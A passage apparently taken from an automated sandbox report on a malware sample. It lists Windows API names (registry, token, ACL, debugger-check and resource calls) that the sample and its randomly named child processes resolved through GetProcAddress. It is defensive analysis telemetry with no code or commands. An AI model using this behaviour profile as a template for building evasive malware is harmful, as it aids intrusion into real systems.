with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005920)\n \"22f2b05a626dda69a125ebae613b9e923eaf29895b33afd54d34925cc06c5d3e.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005920)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005756)\n \"bauqs.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005756)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00005740)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00005740)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00004108)\n \"xyzuqi.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004108)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter TlsSetValue (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter TlsGetValue (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter lstrcpyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WaitForMultipleObjectsEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VirtualQueryEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VirtualQuery (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter TryEnterCriticalSection (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SystemTimeToTzSpecificLocalTime (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SwitchToThread (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SuspendThread (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SizeofResource (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SignalObjectAndWait (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetThreadPriority (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetThreadLocale (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetLastError (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MulDiv (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LockResource (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GlobalUnlock (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GlobalLock (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GlobalFree (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GlobalFindAtomW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GlobalDeleteAtom (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GlobalAddAtomW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetVersionExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThreadPriority (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter 